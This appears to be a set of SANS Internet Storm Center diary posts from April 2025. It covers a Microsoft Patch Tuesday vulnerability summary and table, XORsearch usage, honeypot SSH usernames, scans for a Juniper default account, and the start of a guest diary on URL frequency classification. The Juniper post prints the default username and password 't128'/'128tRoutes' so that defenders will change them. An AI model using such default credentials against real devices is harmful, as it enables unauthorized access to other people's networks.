This is a zero-day vulnerability with a severity rating of Important and a CVSS score of 7.8. It is currently being exploited in the wild but had not been publicly disclosed. It allows an attacker to elevate their privileges to SYSTEM level, posing a significant risk to affected systems. Security updates for Windows 10 (x64-based and 32-bit systems) are not yet available; Microsoft plans to release them as soon as possible, and customers will be notified through a revision to the CVE information once the updates are ready.

Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2025-26663)
This critical vulnerability, CVE-2025-26663, has not been exploited in the wild or disclosed publicly, so it is not a zero-day. It carries a CVSS score of 8.1, reflecting the significant risk posed by its potential for remote code execution. The vulnerability arises from a race condition that an unauthenticated attacker could exploit by sending specially crafted requests to a vulnerable LDAP server, leading to a use-after-free scenario. Although the attack complexity is high, requiring the attacker to win a race condition, the severity of the potential impact underscores the critical nature of this vulnerability. Currently, security updates for Windows 10 systems are not immediately available, but they will be released as soon as possible, with notifications provided via a revision to the CVE information.

Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability (CVE-2025-26670)
This critical vulnerability, identified as CVE-2025-26670, has not been exploited in the wild or disclosed publicly. It carries a CVSS score of 8.1, indicating a significant risk of remote code execution. The vulnerability arises from a race condition that can be exploited by an unauthenticated attacker sending specially crafted requests to a vulnerable LDAP server, potentially resulting in a use-after-free condition. This could be leveraged to execute arbitrary code remotely. Despite the high attack complexity (AC:H), the potential impact is severe. Currently, security updates for Windows 10 systems are not available, but Microsoft plans to release them as soon as possible, with notifications provided through a revision to the CVE information.

Windows Remote Desktop Services Remote Code Execution Vulnerability (CVE-2025-27480)
This is a critical vulnerability with a CVSS score of 8.1 that has not been exploited in the wild or publicly disclosed, so it is not a zero-day. It allows remote code execution by an attacker who connects to a system with the Remote Desktop Gateway role. The attack involves triggering a race condition to create a use-after-free scenario, which can then be leveraged to execute arbitrary code. Despite its critical severity, the attack complexity is high, requiring the attacker to successfully win a race condition to exploit the vulnerability.

Windows Remote Desktop Services Remote Code Execution Vulnerability (CVE-2025-27482)
This is a critical vulnerability with a CVSS score of 8.1 that has not been exploited in the wild or disclosed publicly, so it is not a zero-day. It allows remote code execution, posing a significant risk to systems with the Remote Desktop Gateway role. Exploitation requires an attacker to succeed at a high-complexity attack, specifically by winning a race condition that leads to a use-after-free situation, ultimately enabling the execution of arbitrary code. Organizations running the Remote Desktop Gateway role are advised to apply the update promptly and monitor for suspicious activity.

This summary highlights key vulnerabilities from Microsoft's monthly updates, focusing on those posing significant risks. The Windows Common Log File System Driver vulnerability (CVE-2025-29824) is a zero-day threat actively exploited, allowing attackers to gain SYSTEM-level privileges. Users should prioritize monitoring and applying updates once available. Other critical vulnerabilities, such as those affecting LDAP and Remote Desktop Services, involve complex attack scenarios but pose severe risks due to potential remote code execution. Microsoft Office and Excel vulnerabilities also present significant threats, often requiring user interaction through social engineering tactics. Users are advised to remain vigilant and apply security updates promptly upon release to mitigate these risks.

 

Description
CVE Disclosed Exploited Exploitability (old versions) Exploitability (current version) Severity CVSS Base (AVG) CVSS Temporal (AVG)
ASP.NET Core and Visual Studio Denial of Service Vulnerability
CVE-2025-26682 No No - - Important 7.5 6.5
Active Directory Certificate Services Elevation of Privilege Vulnerability
CVE-2025-27740 No No - - Important 8.8 7.7
Active Directory Domain Services Elevation of Privilege Vulnerability
CVE-2025-29810 No No - - Important 7.5 6.5
Azure Local Cluster Information Disclosure Vulnerability
CVE-2025-25002 No No - - Important 6.8 5.9
CVE-2025-26628 No No - - Important 7.3 6.4
Azure Local Elevation of Privilege Vulnerability
CVE-2025-27489 No No - - Important 7.8 6.8
BitLocker Security Feature Bypass Vulnerability
CVE-2025-26637 No No - - Important 6.8 5.9
DirectX Graphics Kernel Elevation of Privilege Vulnerability
CVE-2025-29812 No No - - Important 7.8 6.8
HTTP.sys Denial of Service Vulnerability
CVE-2025-27473 No No - - Important 7.5 6.5
Kerberos Key Distribution Proxy Service Denial of Service Vulnerability
CVE-2025-27479 No No - - Important 7.5 6.5
Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
CVE-2025-26670 No No - - Critical 8.1 7.1
Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability
CVE-2025-29800 No No - - Important 7.8 6.8
CVE-2025-29801 No No - - Important 7.8 6.8
Microsoft DWM Core Library Elevation of Privilege Vulnerability
CVE-2025-24074 No No - - Important 7.8 6.8
CVE-2025-24073 No No - - Important 7.8 6.8
CVE-2025-24060 No No - - Important 7.8 6.8
CVE-2025-24062 No No - - Important 7.8 6.8
Microsoft Dynamics Business Central Information Disclosure Vulnerability
CVE-2025-29821 No No - - Important 5.5 4.8
Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
CVE-2025-25000 No No Less Likely Less Likely Important 8.8 7.7
CVE-2025-29815 No No Less Likely Less Likely Important 7.6 6.6
Microsoft Edge for iOS Spoofing Vulnerability
CVE-2025-29796 No No Less Likely Less Likely Low 4.7 4.2
CVE-2025-25001 No No Less Likely Less Likely Low 4.3 3.8
Microsoft Excel Remote Code Execution Vulnerability
CVE-2025-27751 No No - - Important 7.8 6.8
CVE-2025-27752 No No - - Critical 7.8 6.8
CVE-2025-27750 No No - - Important 7.8 6.8
CVE-2025-29791 No No - - Critical 7.8 6.8
CVE-2025-29823 No No - - Important 7.8 6.8
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability
CVE-2025-26641 No No - - Important 7.5 6.5
Microsoft Office Elevation of Privilege Vulnerability
CVE-2025-27744 No No - - Important 7.8 6.8
CVE-2025-29792 No No - - Important 7.3 6.4
Microsoft Office Remote Code Execution Vulnerability
CVE-2025-27745 No No - - Critical 7.8 6.8
CVE-2025-27746 No No - - Important 7.8 6.8
CVE-2025-27748 No No - - Critical 7.8 6.8
CVE-2025-27749 No No - - Critical 7.8 6.8
CVE-2025-26642 No No - - Important 7.8 6.8
Microsoft OneNote Security Feature Bypass Vulnerability
CVE-2025-29822 No No - - Important 7.8 6.8
Microsoft OpenSSH for Windows Elevation of Privilege Vulnerability
CVE-2025-27731 No No - - Important 7.8 6.8
Microsoft SharePoint Remote Code Execution Vulnerability
CVE-2025-29793 No No - - Important 7.2 6.3
CVE-2025-29794 No No - - Important 8.8 7.7
Microsoft Streaming Service Denial of Service Vulnerability
CVE-2025-27471 No No - - Important 5.9 5.2
Microsoft System Center Elevation of Privilege Vulnerability
CVE-2025-27743 No No - - Important 7.8 6.8
Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability
CVE-2025-26688 No No - - Important 7.8 6.8
Microsoft Word Remote Code Execution Vulnerability
CVE-2025-27747 No No - - Important 7.8 6.8
CVE-2025-29820 No No - - Important 7.8 6.8
Microsoft Word Security Feature Bypass Vulnerability
CVE-2025-29816 No No - - Important 7.5 6.5
NTFS Elevation of Privilege Vulnerability
CVE-2025-27741 No No - - Important 7.8 6.8
CVE-2025-27483 No No - - Important 7.8 6.8
CVE-2025-27733 No No - - Important 7.8 6.8
NTFS Information Disclosure Vulnerability
CVE-2025-27742 No No - - Important 5.5 4.8
Outlook for Android Information Disclosure Vulnerability
CVE-2025-29805 No No - - Important 7.5 6.5
RPC Endpoint Mapper Service Elevation of Privilege Vulnerability
CVE-2025-26679 No No - - Important 7.8 6.8
Remote Desktop Client Remote Code Execution Vulnerability
CVE-2025-27487 No No - - Important 8.0 7.0
Visual Studio Code Elevation of Privilege Vulnerability
CVE-2025-20570 No No - - Important 6.8 5.9
Visual Studio Elevation of Privilege Vulnerability
CVE-2025-29802 No No - - Important 7.3 6.4
CVE-2025-29804 No No - - Important 7.3 6.4
Visual Studio Tools for Applications and SQL Server Management Studio Elevation of Privilege Vulnerability
CVE-2025-29803 No No - - Important 7.3 6.4
Win32k Elevation of Privilege Vulnerability
CVE-2025-26681 No No - - Important 6.7 6.0
CVE-2025-26687 No No - - Important 7.5 6.5
Windows Admin Center in Azure Portal Information Disclosure Vulnerability
CVE-2025-29819 No No - - Important 6.2 5.4
Windows Bluetooth Service Elevation of Privilege Vulnerability
CVE-2025-27490 No No - - Important 7.8 6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2025-29824 No Yes - - Important 7.8 7.2
Windows Cryptographic Services Information Disclosure Vulnerability
CVE-2025-29808 No No - - Important 5.5 4.8
Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2025-24058 No No - - Important 7.8 6.8
Windows Defender Application Control Security Feature Bypass Vulnerability
CVE-2025-26678 No No - - Important 8.4 7.3
Windows Digital Media Elevation of Privilege Vulnerability
CVE-2025-27476 No No - - Important 7.8 6.8
CVE-2025-26640 No No - - Important 7.0 6.1
%%cve:2025-27467%% No No - - Important 7.8 6.8
%%cve:2025-27730%% No No - - Important 7.8 6.8
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2025-27732%% No No - - Important 7.0 6.1
Windows Hello Security Feature Bypass Vulnerability
%%cve:2025-26635%% No No - - Important 6.5 5.7
Windows Hello Spoofing Vulnerability
%%cve:2025-26644%% No No - - Important 5.1 4.5
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2025-27491%% No No - - Critical 7.1 6.2
Windows Installer Elevation of Privilege Vulnerability
%%cve:2025-27727%% No No - - Important 7.8 6.8
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2025-26647%% No No - - Important 8.1 7.1
Windows Kerberos Security Feature Bypass Vulnerability
%%cve:2025-29809%% No No - - Important 7.1 6.5
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2025-26648%% No No - - Important 7.8 6.8
%%cve:2025-27739%% No No - - Important 7.8 6.8
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
%%cve:2025-27728%% No No - - Important 7.8 6.8
Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
%%cve:2025-26673%% No No - - Important 7.5 6.5
%%cve:2025-27469%% No No - - Important 7.5 6.5
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
%%cve:2025-26663%% No No - - Critical 8.1 7.1
Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability
%%cve:2025-27478%% No No - - Important 7.0 6.1
%%cve:2025-21191%% No No - - Important 7.0 6.1
Windows Local Session Manager (LSM) Denial of Service Vulnerability
%%cve:2025-26651%% No No - - Important 6.5 5.7
Windows Mark of the Web Security Feature Bypass Vulnerability
%%cve:2025-27472%% No No - - Important 5.4 4.7
Windows Media Remote Code Execution Vulnerability
%%cve:2025-26666%% No No - - Important 7.8 6.8
%%cve:2025-26674%% No No - - Important 7.8 6.8
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability
%%cve:2025-29811%% No No - - Important 7.8 6.8
Windows NTFS Information Disclosure Vulnerability
%%cve:2025-21197%% No No - - Important 6.5 5.7
Windows Power Dependency Coordinator Information Disclosure Vulnerability
%%cve:2025-27736%% No No - - Important 5.5 4.8
Windows Process Activation Elevation of Privilege Vulnerability
%%cve:2025-21204%% No No - - Important 7.8 6.8
Windows Remote Desktop Services Remote Code Execution Vulnerability
%%cve:2025-26671%% No No - - Important 8.1 7.1
%%cve:2025-27480%% No No - - Critical 8.1 7.1
%%cve:2025-27482%% No No - - Critical 8.1 7.1
Windows Resilient File System (ReFS) Information Disclosure Vulnerability
%%cve:2025-27738%% No No - - Important 6.5 5.7
Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
%%cve:2025-26664%% No No - - Important 6.5 5.7
%%cve:2025-26669%% No No - - Important 8.8 7.7
%%cve:2025-26667%% No No - - Important 6.5 5.7
%%cve:2025-27474%% No No - - Important 6.5 5.7
%%cve:2025-21203%% No No - - Important 6.5 5.7
%%cve:2025-26672%% No No - - Important 6.5 5.7
%%cve:2025-26676%% No No - - Important 6.5 5.7
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2025-26668%% No No - - Important 7.5 6.5
Windows Secure Channel Elevation of Privilege Vulnerability
%%cve:2025-26649%% No No - - Important 7.0 6.1
%%cve:2025-27492%% No No - - Important 7.0 6.1
Windows Security Zone Mapping Security Feature Bypass Vulnerability
%%cve:2025-27737%% No No - - Important 8.6 7.5
Windows Shell Remote Code Execution Vulnerability
%%cve:2025-27729%% No No - - Important 7.8 6.8
Windows Standards-Based Storage Management Service Denial of Service Vulnerability
%%cve:2025-26680%% No No - - Important 7.5 6.5
%%cve:2025-27470%% No No - - Important 7.5 6.5
%%cve:2025-21174%% No No - - Important 7.5 6.5
%%cve:2025-26652%% No No - - Important 7.5 6.5
%%cve:2025-27485%% No No - - Important 7.5 6.5
%%cve:2025-27486%% No No - - Important 7.5 6.5
Windows Subsystem for Linux Elevation of Privilege Vulnerability
%%cve:2025-26675%% No No - - Important 7.8 6.8
Windows TCP/IP Remote Code Execution Vulnerability
%%cve:2025-26686%% No No - - Critical 7.5 6.5
Windows Telephony Service Remote Code Execution Vulnerability
%%cve:2025-27477%% No No - - Important 8.8 7.7
%%cve:2025-21205%% No No - - Important 8.8 7.7
%%cve:2025-21221%% No No - - Important 8.8 7.7
%%cve:2025-21222%% No No - - Important 8.8 7.7
%%cve:2025-27481%% No No - - Important 8.8 7.7
Windows USB Print Driver Elevation of Privilege Vulnerability
%%cve:2025-26639%% No No - - Important 7.8 6.8
Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability
%%cve:2025-27484%% No No - - Important 7.5 6.5
Windows Update Stack Elevation of Privilege Vulnerability
%%cve:2025-27475%% No No - - Important 7.0 6.1
Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability
%%cve:2025-27735%% No No - - Important 6.0 5.2
Windows upnphost.dll Elevation of Privilege Vulnerability
%%cve:2025-26665%% No No - - Important 7.0 6.1

--

Renato Marinho

 


Published: 2025-04-07

XORsearch: Searching With Regexes

Xavier asked me a question from one of his FOR610 students: "How can you perform a regex search with XORsearch?"

XORsearch is a tool like grep, but it performs a brute-force attack on the input file, trying out different encodings such as XOR.

You can give it a string to search for, but not a regular expression.

There is a workaround, however: let XORsearch extract all possible strings, and then use a regular expression to grep through the results.

Here is an example with a Cobalt Strike beacon:

Option -S instructs XORsearch to extract all ASCII strings, and re-search.py is used with its built-in regular expression for IPv4 addresses.

We obtain one address, which we then use directly with XORsearch:

This gives us more information: we see a URL path, and we learn that the encoding is XOR with key 0x0D.

With option -n, we can look for even more info surrounding that IPv4 address:

There is also a method using YARA rules, but for that I need to publish a Python version of xorsearch first. More details in an upcoming diary entry.
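The strings-then-regex workaround can be illustrated with a small Python sketch. This is not how XORsearch is implemented: it only brute-forces single-byte XOR keys (XORsearch also tries other encodings such as ROL, ROT and SHIFT), the minimum string length of 4 is an assumption borrowed from the usual `strings` behavior, the IPv4 pattern is the trivial "4 numbers separated by dots" regex rather than whatever re-search.py has built in, and the helper names `xor` and `regex_search_xor` are hypothetical.

```python
import re

# Runs of 4 or more printable ASCII bytes (assumed minimum length, like `strings`)
STRINGS = re.compile(rb'[\x20-\x7e]{4,}')
# Trivial IPv4 pattern: 4 numbers separated by dots
IPV4 = re.compile(rb'\d+\.\d+\.\d+\.\d+')


def xor(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)


def regex_search_xor(data: bytes, pattern: re.Pattern = IPV4):
    """Try every single-byte XOR key, extract ASCII strings, then grep them.

    Yields (key, matched_text) tuples for every regex hit.
    """
    for key in range(256):
        decoded = xor(data, key)
        for string in STRINGS.findall(decoded):
            for match in pattern.findall(string):
                yield key, match.decode('ascii')


if __name__ == '__main__':
    # Made-up "beacon" string (192.0.2.0/24 is a documentation range), XOR-encoded with 0x0D
    sample = xor(b'GET http://192.0.2.10/path', 0x0D)
    for key, match in regex_search_xor(sample):
        print(f'key 0x{key:02X}: {match}')
```

Printing the key alongside each hit gives the same information XORsearch reports, so the key can then be used for a targeted follow-up search.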

 

Didier Stevens
Senior handler
blog.DidierStevens.com


Published: 2025-04-06

New SSH Username Report

As you may have noticed from some of my recent diaries, I have spent a bit more time on SSH and Telnet credentials. These credentials are collected by Cowrie, the amazing full-featured SSH and Telnet honeypot maintained by Michel Oosterhof. Cowrie is installed as a component when you install our DShield honeypot.

One very simple way to find "interesting" things is to look at what is new. To let you explore on your own, I added an "SSH/Telnet Username Summary". The report lists all usernames we observed in the last 30 days, provided we saw them at least five times. These numbers may, of course, change. There is also a simple JSON-formatted report you may download to play with: https://isc.sans.edu/sshallusernames.json
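The "look at what is new" idea boils down to a threshold plus a set difference. The sketch below is an assumption about how such a filter could work, not the logic behind the ISC report: the structure of sshallusernames.json is not described here, so the function takes plain Python data (a Counter of recent username counts and a set of usernames seen before that window), and the name `new_usernames` is hypothetical. The default of five mirrors the report's minimum count.

```python
from collections import Counter


def new_usernames(recent_counts: Counter, previously_seen: set, min_count: int = 5) -> list:
    """Return usernames seen at least min_count times recently but never before.

    recent_counts: username -> number of attempts in the recent window (e.g. 30 days)
    previously_seen: usernames observed before that window
    """
    return sorted(
        name
        for name, count in recent_counts.items()
        if count >= min_count and name not in previously_seen
    )


if __name__ == '__main__':
    # Illustrative counts only, not real honeypot data
    recent = Counter({'root': 900, 'dbmasteruser': 7, 'uery': 5, 'rare': 2})
    print(new_usernames(recent, previously_seen={'root', 'admin'}))
    # ['dbmasteruser', 'uery']
```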

So let's take a quick look at "what's new":

  • ysoperator: Looks familiar, but I can't remember where I saw it. Google is of little help here.
  • uery: Maybe a typo, and should be "query"?
  • tamatiek: Appears to be a Japanese name?
  • shughes: I guess this is for "S Hughes". Many systems use the first initial and last name as the username. There are a few more like that, which I will skip here.
  • dbmasteruser: Something a bit more interesting. Likely supposed to refer to a database administrator account.

And there is one I found funny: /usr/share/wordlists/logins.txt. Yes, the filename and path. I suspect the user didn't yet know how to run the brute-force script and passed the filename instead of the username. There are a few I consider typos: "atascientist" (I suspect "datascientist") and "ackupadmin" ("backupadmin"?). It could also be a tool that swallows the first letter of the username if the username is not provided correctly.
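The "swallowed first letter" hypothesis can be checked mechanically by indexing known usernames by everything after their first character. A minimal sketch: the "known" list is whatever reference list you trust (the one below is made up), the function name `dropped_first_letter` is hypothetical, and a hit only shows consistency with the hypothesis, not proof of it.

```python
def dropped_first_letter(observed, known):
    """Map observed usernames to known usernames missing only their first character.

    observed: iterable of usernames seen in the logs
    known: set of usernames considered "real"
    """
    # Index every known username by its value without the first character
    by_suffix = {}
    for name in sorted(known):
        if len(name) > 1:
            by_suffix.setdefault(name[1:], name)
    # Keep observed names that match a truncated known name and are not known themselves
    return {
        name: by_suffix[name]
        for name in observed
        if name in by_suffix and name not in known
    }


if __name__ == '__main__':
    known = {'datascientist', 'backupadmin', 'query', 'root', 'shughes'}
    observed = ['atascientist', 'ackupadmin', 'uery', 'shughes', 'root']
    print(dropped_first_letter(observed, known))
    # {'atascientist': 'datascientist', 'ackupadmin': 'backupadmin', 'uery': 'query'}
```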

I am working on a similar list of passwords, but there are many more distinct passwords than usernames, making that a bit more challenging. Let me know if there are any additional details I should add.

Lesson: Attackers make mistakes too, and there are no real "safe" usernames. 

List of recently seen "new" usernames

 

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


Published: 2025-04-02

Surge in Scans for Juniper "t128" Default User

Last week, I noticed a surge in scans for the username "t128". This username, accompanied by the password "128tRoutes", is a well-known default account for Juniper's Session Smart Networking Platform (or "SSR" for "Session Smart Routing"). The username and password are a bit "odd". Juniper acquired a company called "128 Technology" a few years ago and, with this acquisition, integrated SSR into its product portfolio. But much of the product, including default usernames and passwords, remained unchanged. The documentation, including the default username and passwords, is still at 128technology.com [1].

The scans we observed lasted from March 23rd to 28th. About 3,000 source IPs took part in these scans. Many of them are well known for scanning SSH and are likely part of some "Mirai-type" botnet.
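Counting distinct source IPs per day for one username is the kind of query behind an observation like this. A sketch, assuming Cowrie's JSON log format (one JSON object per line with `eventid` values such as `cowrie.login.failed` and `cowrie.login.success`, plus `username`, `src_ip` and an ISO 8601 `timestamp`); the function name is hypothetical and this is not how the ISC data pipeline works.

```python
import json
from collections import defaultdict


def sources_per_day(lines, username='t128'):
    """Count distinct source IPs per day that tried to log in as `username`.

    Assumes Cowrie-style JSON lines with eventid, username, src_ip and an
    ISO 8601 timestamp such as "2025-03-23T10:00:00.000000Z".
    """
    per_day = defaultdict(set)
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if not isinstance(event, dict):
            continue
        if not str(event.get('eventid', '')).startswith('cowrie.login'):
            continue  # only login attempts (failed or successful)
        if event.get('username') != username:
            continue
        day = str(event.get('timestamp', ''))[:10]  # keep the YYYY-MM-DD part
        per_day[day].add(event.get('src_ip'))
    return {day: len(ips) for day, ips in sorted(per_day.items())}


if __name__ == '__main__':
    # Made-up events (192.0.2.0/24 is a documentation range)
    sample = [
        json.dumps({'eventid': 'cowrie.login.failed', 'username': 't128',
                    'password': '128tRoutes', 'src_ip': '192.0.2.1',
                    'timestamp': '2025-03-23T10:00:00.000000Z'}),
        json.dumps({'eventid': 'cowrie.login.failed', 'username': 't128',
                    'password': '128tRoutes', 'src_ip': '192.0.2.2',
                    'timestamp': '2025-03-23T11:00:00.000000Z'}),
        json.dumps({'eventid': 'cowrie.login.failed', 'username': 'root',
                    'password': '123456', 'src_ip': '192.0.2.3',
                    'timestamp': '2025-03-24T09:00:00.000000Z'}),
    ]
    print(sources_per_day(sample))  # {'2025-03-23': 2}
```

Using a set per day means an IP that retries many times is still counted once, which is what "source IPs took part" measures.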

Double-check that you are not using the default password for the root or t128 account. Some older user questions suggest that changing the password is not always effective, or that the process is not obvious [2].

 

graph showing an increase in scans for the t128 account and default password for end of March

[1] https://docs.128technology.com/docs/cc_fips_access_mgmt/
[2] https://community.juniper.net/discussion/admin-and-t128-users-remain-with-default-passwords-after-onboarding-to-conductor-thoughts

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


Published: 2025-04-02

Exploring Statistical Measures to Predict URLs as Legitimate or Intrusive [Guest Diary]

[This is a Guest Diary by Gregory Weber, an ISC intern as part of the SANS.edu BACS program]

For the last 5 months, as part of my BACS internship with SANS, I have monitored two deployments of a DShield sensor, sometimes referred to as a honeypot. The DShield sensor offers multiple attack surfaces, including Telnet and SSH ports, and one of its features is a public-facing web server. One of my deployments sits on a cloud instance, and its web server sees a large volume of traffic, making it ideal for research on web server attacks.

Many of the web "attacks" I have observed are rapid-fire URL submissions to the WordPress server meant to see if the server will reveal any of its "secrets", like encryption key files, user accounts, or back-end logic. Moreover, the submissions are automated and often appear to be "just passing by, saw you were a web server, so thought I would try" opportunity checks (like a crook pulling door handles in a parking lot to see if one happens to open for a quick snag). As a community, information security professionals are probably more concerned with targeted attacks on their organizations, but crimes of opportunity can be just as damaging, particularly where they reveal weaknesses to an attack group that may otherwise never bother with that specific organization.

While tending to my daily analysis, I have also been progressing through SEC595 "Applied Data Science and AI/Machine Learning for Cybersecurity Professionals". I enjoy the challenges of coding and I am fascinated with data-driven decisions, particularly where carefully thought-out data science logic can help us separate the things our human problem-solving skills and expertise need to focus on from the thousands of things they do not.

As such, I decided to experiment with applying frequency analysis to the DShield data I had been collecting, just to see whether I could write a simple classification program. I chose to focus on the web honeypot URL data to write a program that parses a URL and determines whether it represents an intrusive request or what I call a legitimate request. The experiment differs from many other categorical URL classification programs in that those classifiers are often focused on user-initiated connections to external sites. In other words, those programs attempt to determine whether a URL a user is clicking/typing is malicious based on metrics such as "known bad" IP address lists or name lists. This program is focused on URLs that may be submitted to a public-facing web server in attempts to scope the server's logic, perform command injection, perform server-side request forgery, or retrieve restricted files from a database or file directory that trusts the server.

Why This Project?

I should state up front that I am aware this is not groundbreaking: WAFs and lots of other goodies that organizations purchase use sophisticated methods to tag-team this task as part of a layered defense. Anyone reading this is no doubt aware that Web Application Firewalls are designed to apply many checks to intercept malicious web requests before they can ever reach the server. A strong defense-in-depth strategy for any public-facing server will also harden the server itself against anything that makes it past the firewall, with input validation logic, parameterized queries, and similar measures. In the spirit of least-privilege design, it will also restrict the permissions of the server account and remove any files from its directories that are not needed to perform its functions. However, web servers are still among the most commonly attacked systems, and this would not be so if the attacks did not work some of the time. And there is another important consideration.

Information security in 2025 has continued to shift away from the idea that keeping attackers "out" is the strongest strategy. Keeping attackers out is still the ideal goal, but the community has recognized that with so many applications, so many patches, so many systems that need to talk to each other, so many coding libraries, and so on, no organization bats a thousand at keeping attackers out. Applying statistical data science to an already robustly protected web application gives security monitors another tool. Consider a yet-undiscovered vulnerability or exposed resource that allows a maliciously crafted URL to succeed: the WAF does not intercept it, and the server processes the request and returns a 200 response, making it much more likely that no one notices the attack was successful. A statistically based approach that alerts the SOC based on the probability that a URL was crafted to be intrusive does not rely on a logged 400-level response or a WAF rule; it simply alerts someone to put eyes on the request. Security tools rely on rules, which engineers update as new exploits are discovered. Until the new rule is written, the tool does not alert anyone because it does not "know" that it should. Statistical models can alert based on probability, and they can discern abnormal requests based on features, a topic that is extremely fascinating and promising for the blue team.

For me, this was a learning experience and an attempt to experiment with DShield data while gaining more experience with malicious web queries. It is not sophisticated, but it offers an example of how these models function.

Approach

For continued learning, I want to apply various descriptive statistical models, probability theory, and eventually more sophisticated machine learning models to URL suffixes to categorize them as either legitimate or intrusion-oriented, using techniques practiced in SEC595. This diary focuses on the simplest approach, using frequency analysis as the basis to classify the URL. Frequency is simply how often something occurs in a set of data (in this case, URL suffixes).

It is a fair question to ask how and why something like this would be expected to work. Leaving out the "how" for a moment, the "why would it work" question comes down to the entire concept of attacking a machine that accepts user input. The attacks highlighted by OWASP have in common that they use malformed input to trick an application. Therefore, it seemed possible to me that if I could build a dictionary of words or phrases that are "malformed", along with a separate dictionary of words/phrases common to everyday URL submissions, I could take any URL, parse it into its pieces, and then compare how many of those pieces appear in the "normal" dictionary versus how many appear in the "malformed" dictionary. Whichever dictionary contains more pieces of the URL determines whether the URL is likely an attack. Although I don't explore it in this experiment, it would be relatively easy to move beyond a simple majority vote and set a different threshold (say 70/30), or whatever seems to work best.
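The vote and the optional threshold can be written as one small function. A minimal sketch under stated assumptions: the URL has already been parsed into a list of words, `frequency_vote` is a hypothetical name, and the vocabularies below are made up. With `threshold=0.5` it reduces to the diary's majority vote where ties go to "legit"; `0.7` would demand a 70/30 split before calling a URL intrusive. A word present in both dictionaries (such as "-" below) counts as a hit for both sides.

```python
def frequency_vote(words, legit_vocab, intrusive_vocab, threshold=0.5):
    """Classify a parsed URL by the share of its dictionary hits that are intrusive.

    words: the parsed pieces of one URL
    legit_vocab / intrusive_vocab: containers supporting `in` (sets, dicts, Counters)
    threshold: 0.5 is a simple majority vote; 0.7 requires a 70/30 split
    """
    legit_hits = sum(1 for word in words if word in legit_vocab)
    intrusive_hits = sum(1 for word in words if word in intrusive_vocab)
    hits = legit_hits + intrusive_hits
    if hits == 0:
        return 'legit'  # no evidence either way; treated like a tie
    return 'intrusive' if intrusive_hits / hits > threshold else 'legit'


if __name__ == '__main__':
    legit_vocab = {'top', 'order', 'pay', 'to', 'us', '-'}
    intrusive_vocab = {'wp-config.php', 'wp', 'config.php', 'php', '.', '-'}
    url_words = ['wp-config.php', 'wp', 'php', '.', '-']
    print(frequency_vote(url_words, legit_vocab, intrusive_vocab))       # intrusive (5 of 6 hits)
    print(frequency_vote(url_words, legit_vocab, intrusive_vocab, 0.9))  # legit (5/6 is not > 0.9)
```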

Below I will walk through the specific steps and provide the code used (feedback is welcome). The program focuses specifically on the content that follows "www.website.tld".

Overview of Steps for Frequency Classification

1. Obtain URL requests generally deemed malicious (DShield 404 logs).
2. Obtain URL requests that reflect legitimate, normal website traversal.
3. Isolate the specific suffixes and create two dictionaries of words/phrases present in the URLs, one based on the legitimate URLs and the other on known malicious URLs.
4. Create a frequency function that classifies a random URL by comparing how many of its parts appear in each dictionary.
5. Check whether the accuracy reveals anything useful.
6. Refine and enhance with other, more sophisticated machine learning methods as time allows in the future.

Steps 1 and 2: Obtaining the Data

To obtain malicious web requests, I used a DShield sensor deployed as part of BACS 4499 that contains a web server and logs URL requests to the server. Since this device is specifically deployed to be attacked and, indeed, has been "attacked" throughout the last 6 months, my experiment assumes that all of these URL requests, except as noted below, are attempts to expose restricted access rather than legitimate web requests. The exception is any request for "/" alone, as that represents the root of the web server and is common to all top-level page requests.

The more difficult challenge was to obtain URLs of legitimate website interaction. The challenge is two-fold:
1. Locating a source of aggregate data like this without visiting random websites to build what is likely only a very narrow list.
2. Website structure is specific to each organization. There are no "rules" for how this is done, though there are fairly conventional URL structures based on the use of LAMP stacks and typical application programming.

To overcome this obstacle, I decided to use a dataset generated as part of a demonstration of how to use Python code to map websites. The code crawled various legitimate websites, producing URLs that reach the full depth of each site. Again, due to the wide variety of site structures prevalent across the internet, this data does not provide a complete training model (neither does the DShield intrusive URL data), but it did provide a great starting point for experimenting. The dataset of "legit" URLs is courtesy of Elias Dabbas, published on Kaggle.com.

The URLs were then separated into two folders of CSV files containing links: one legit and one intrusion-oriented. For both folders, some of the data is left unused until it is time to test the function's accuracy on known data. The first five files of each type are shown below. The reader will observe that there are more "Intrusive" files than "Legit" files; however, the legitimate URL data files are significantly larger (they contain more URLs each).

print(f'Num intrusive URL files: {len(intrusive_files)}\tNum of legit URL files: {len(legit_files)}')
print(intrusive_files[0:5], '\n', legit_files[0:5])       

Num intrusive URL files: 25     Num of legit URL files: 6
['./Attack Observations/Project/Intrusive/404reports_2025-01-25.csv', './Attack Observations/Project/Intrusive/404reports_2025-01-30.csv', './Attack Observations/Project/Intrusive/404reports_2025-02-13.csv', './Attack Observations/Project/Intrusive/404reports_2025-02-14.csv', './Attack Observations/Project/Intrusive/404reports_2025-02-15.csv'] 
